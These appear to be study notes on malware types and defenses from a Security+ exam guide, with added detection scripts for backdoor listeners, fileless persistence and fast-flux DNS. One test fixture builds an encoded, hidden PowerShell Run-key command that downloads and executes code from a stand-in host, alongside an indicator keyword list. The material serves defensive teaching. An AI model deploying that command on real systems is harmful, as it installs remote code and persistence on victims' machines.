CompTIA Security+ 601 Chapter 3 Summary

CompTIA Security+ Study Guide: Exam SY0-601 8th Edition, by Mike Chapple & David Seidl

Chapter 3 summary of my notes.


  1. Malware

            Types of Malware:

    1. Ransomware

      1. Ransomware is malware that encrypts the victim's files; the attacker then demands a ransom in exchange for the decryption key.

      2. One of the most important defenses against ransomware is an effective backup system. The backups must be kept offline or otherwise out of the malware's reach, or they will be encrypted along with everything else.

    2. Trojans

      1. Trojans, or Trojan horses, are malware disguised as legitimate software. They rely on the user to install or run them.

    3. RATs

      1. Remote access Trojans (RATs) provide attackers with remote access to, and control of, infected systems.

    4. Worms

      1. Unlike Trojans, which require user interaction, worms spread themselves. Worms are often associated with attacks on vulnerable network services, but any automated means of spread is possible, so worms can also propagate via email attachments, network file shares, or other methods. Worms self-install rather than requiring users to click on them, which makes them especially dangerous.

    5. Rootkits

      1. Rootkits are malware designed to give attackers backdoor access to a system while concealing their presence from the user and from security tools.

      2. Some rootkits (often called bootkits) infect the startup code in the master boot record (MBR) of a disk. Because they load before the operating system, they can attack full-disk encryption systems, for example by capturing the passphrase as it is entered.

    6. Backdoors

      1. Backdoors can be hardware or software based, but in most scenarios on the Security+ exam you will be concerned with software-based backdoors. Backdoors can sometimes be detected by checking for unexpected open ports and services, but more sophisticated backdoor tools hide inside existing services.

      2. Examples include web-based backdoors that answer on a different URL under an existing web service, and backdoors that conceal their traffic by tunneling out to a remote control host over encrypted or obfuscated channels.

    7. Keyloggers

      1. Keyloggers work in a multitude of ways, ranging from tools that capture keystrokes at the kernel level, through APIs or scripts, to tools that read them directly from memory.

    8. Logic Bombs

      1. Logic bombs are functions or code placed inside other programs that activate when set conditions are met.

    9. Spyware

      1. Spyware is malware designed to obtain information about an individual, organization, or system.

    10. Viruses

      1. Computer viruses are malicious programs that self-copy and self-replicate.

      2. Viruses typically have both a trigger, which sets the conditions for when the virus will execute, and a payload, which is what the virus does, delivers, or the actions it performs.

    11. Fileless Viruses

      1. Fileless virus attacks resemble traditional viruses in several critical ways: they spread via methods like spam email and malicious websites, and they exploit flaws in web browsers and browser plug-ins.

      2. They inject themselves into memory and conduct further malicious activity from there, including adding the ability to reinfect the system through the same process at reboot via a registry entry or a similar technique. At no point do they require local file storage, because they remain memory resident throughout their active life. In fact, the only stored artifacts of many fileless attacks are those of their persistence mechanism, such as the registry entry.
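Two of the artifacts described in the Backdoors and Fileless Viruses notes above can be checked for with a small baseline-driven triage script: a listening service that is not in the host's expected set, and a registry Run-key entry that launches an encoded PowerShell command. The following is an added example and is not code from the study guide. The expected-listener baseline, the `ss -tlnp`-style lines, the registry lines, the sample command and the `example.invalid` host are all constructed here for illustration.

```python
"""
Baseline-driven triage for two host artifacts: an unexpected listening
service (a classic backdoor tell) and a Run-key entry that launches an
encoded PowerShell command (a common fileless persistence technique).
Added example, not from the study guide; every input is constructed here.
"""
import base64
import re

# Constructed baseline (assumption: a web server that also runs sshd).
EXPECTED_LISTENERS = {22, 80, 443}

# Constructed lines in the shape of `ss -tlnp` output.
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*     users:(("sshd",pid=812,fd=3))
LISTEN 0      511          0.0.0.0:80        0.0.0.0:*     users:(("nginx",pid=1201,fd=6))
LISTEN 0      511          0.0.0.0:443       0.0.0.0:*     users:(("nginx",pid=1201,fd=7))
LISTEN 0      128          0.0.0.0:4444      0.0.0.0:*     users:(("nc",pid=2330,fd=4))
LISTEN 0      128        127.0.0.1:631       0.0.0.0:*     users:(("cupsd",pid=640,fd=9))
"""

SS_LINE = re.compile(r'^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)"')


def unexpected_listeners(ss_text, expected=EXPECTED_LISTENERS):
    """Return (port, process) for every listener outside the baseline.

    Loopback-only listeners are reported as well: a backdoor bound to
    127.0.0.1 and reached through a tunnel is still a backdoor, so the
    analyst, not the script, decides that cupsd on 631 is benign.
    """
    found = []
    for line in ss_text.splitlines():
        m = SS_LINE.match(line)
        if m and int(m.group(2)) not in expected:
            found.append((int(m.group(2)), m.group(3)))
    return found


# Constructed persistence entry. PowerShell's -EncodedCommand takes the
# base64 of the script's UTF-16LE bytes, so the sample is built the same way.
SAMPLE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED = base64.b64encode(SAMPLE_CMD.encode("utf-16le")).decode()

# Constructed lines in the shape of `reg query HKCU\...\Run` output.
RUN_KEY_OUTPUT = (
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" "\n"
    r'    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background' "\n"
    "    Updater     REG_SZ    powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED + "\n"
)

# -e, -ec, -enc and -EncodedCommand are all accepted spellings of the flag.
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
SUSPICIOUS = ("-w hidden", "-nop", "-noni", "iex", "downloadstring", "frombase64string")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def suspicious_run_entries(reg_text):
    """Return (value_name, command, indicator_hits) for Run entries that
    carry an encoded command or any of the SUSPICIOUS indicators."""
    results = []
    for line in reg_text.splitlines():
        parts = line.split(None, 2)          # name, type, data
        if len(parts) < 3 or parts[1] != "REG_SZ":
            continue
        name, data = parts[0], parts[2]
        decoded = decode_encoded_command(data)
        haystack = (data + " " + (decoded or "")).lower()
        hits = [s for s in SUSPICIOUS if s in haystack]
        if decoded is not None or hits:
            results.append((name, decoded if decoded is not None else data, hits))
    return results


if __name__ == "__main__":
    for port, proc in unexpected_listeners(SS_OUTPUT):
        print(f"unexpected listener: {proc} on port {port}")
    for name, cmd, hits in suspicious_run_entries(RUN_KEY_OUTPUT):
        print(f"suspicious Run entry {name!r}: {cmd}  indicators={hits}")
```

On the sample input the script reports the `nc` listener on 4444 and the loopback `cupsd` listener (a baseline that is too narrow produces noise, which is the normal tuning problem with this approach), and decodes the `Updater` entry back to the download-and-execute one-liner. Note that a backdoor living inside an existing service, as the notes warn, shows up in neither check; those need the service's own logs or a memory or network view.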




2. Defenses against malware


Tools like secure boot, together with techniques that validate live systems and files against a known-good state, help prevent rootkits from being installed or from remaining resident. Integrity checking (comparing files and running code against trusted hashes) and validating data against expected responses are also useful for rootkit detection.


Many botnet command and control (C&C) systems operate in a client-server mode: the bots contact central control systems, which provide commands and updates. Peer-to-peer botnets connect the bots to each other instead, which makes them much harder to take down by removing a single central server or a handful of known C&C IP addresses or domains. Many botnets also use fast flux DNS: the many systems in the network of control hosts register and deregister their addresses frequently, often every few minutes, on an ongoing basis. Taking down the domain name is the best way to defeat a fast flux DNS-based botnet or malware, since the individual addresses change too quickly to block.
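The fast flux pattern described above can be spotted in resolver logs: a domain whose answers carry very short TTLs and that maps to many different addresses, usually across many networks, within a short window. The script below is an added example and is not code from the study guide; the log lines, the domain names and the thresholds are all constructed for illustration.

```python
"""
Added example, not from the study guide: flagging fast-flux behaviour in
DNS resolver logs. All log lines and domain names are constructed.
"""
from collections import defaultdict

# Constructed resolver log: <epoch seconds> <domain> <answer IP> <TTL>
DNS_LOG = """\
1700000000 cdn.example.net 203.0.113.10 3600
1700000300 cdn.example.net 203.0.113.10 3600
1700000600 cdn.example.net 203.0.113.11 3600
1700000000 upd.flux-example.test 198.51.100.5 60
1700000120 upd.flux-example.test 198.51.100.77 60
1700000240 upd.flux-example.test 192.0.2.33 60
1700000360 upd.flux-example.test 198.51.100.140 60
1700000480 upd.flux-example.test 192.0.2.201 60
1700000600 upd.flux-example.test 203.0.113.99 60
"""


def parse_log(text):
    """Parse the constructed log format into (ts, domain, ip, ttl) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, domain, ip, ttl = line.split()
        records.append((int(ts), domain.lower().rstrip("."), ip, int(ttl)))
    return records


def fast_flux_candidates(records, window=3600, min_ips=5, max_ttl=300):
    """Return {domain: stats} for domains that, inside any `window` seconds,
    resolved to at least `min_ips` distinct addresses with every TTL <= max_ttl.
    Thresholds are constructed defaults and need tuning per environment."""
    by_domain = defaultdict(list)
    for ts, domain, ip, ttl in records:
        by_domain[domain].append((ts, ip, ttl))

    flagged = {}
    for domain, rows in by_domain.items():
        rows.sort()
        for i, (start, _, _) in enumerate(rows):
            in_window = [r for r in rows[i:] if r[0] - start <= window]
            ips = {ip for _, ip, _ in in_window}
            ttl_max = max(t for _, _, t in in_window)
            if len(ips) < min_ips or ttl_max > max_ttl:
                continue
            flagged[domain] = {
                "distinct_ips": len(ips),
                # distinct /24s: flux nodes are compromised hosts spread across ISPs
                "networks": len({ip.rsplit(".", 1)[0] for ip in ips}),
                "max_ttl": ttl_max,
            }
            break
    return flagged


if __name__ == "__main__":
    for domain, stats in fast_flux_candidates(parse_log(DNS_LOG)).items():
        print(f"possible fast flux: {domain} {stats}")
```

On the sample log only `upd.flux-example.test` is flagged (six addresses in three /24s, TTL 60); the CDN name, which rotates slowly between two addresses with hour-long TTLs, is not. Large CDNs and cloud providers also legitimately use low TTLs and many addresses, so this is a triage signal to be confirmed against threat intelligence, not proof. Once a domain is confirmed, the effective response is the one the notes give: have the domain itself taken down rather than chasing the addresses.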


Defenses against PowerShell attacks include Constrained Language Mode, which limits sensitive commands and language features in PowerShell, and Windows Defender Application Control (WDAC) or AppLocker, which validate scripts and limit which modules and plug-ins can be run.


Fortunately, there are existing tools, like chkrootkit and rkhunter, that help defenders search for and identify rootkits.


Adversarial artificial intelligence is a developing field in which attackers use artificial intelligence (AI) for malicious purposes. Tainted training data for machine learning algorithms will be a target, and the security of the machine learning algorithms themselves will be increasingly important.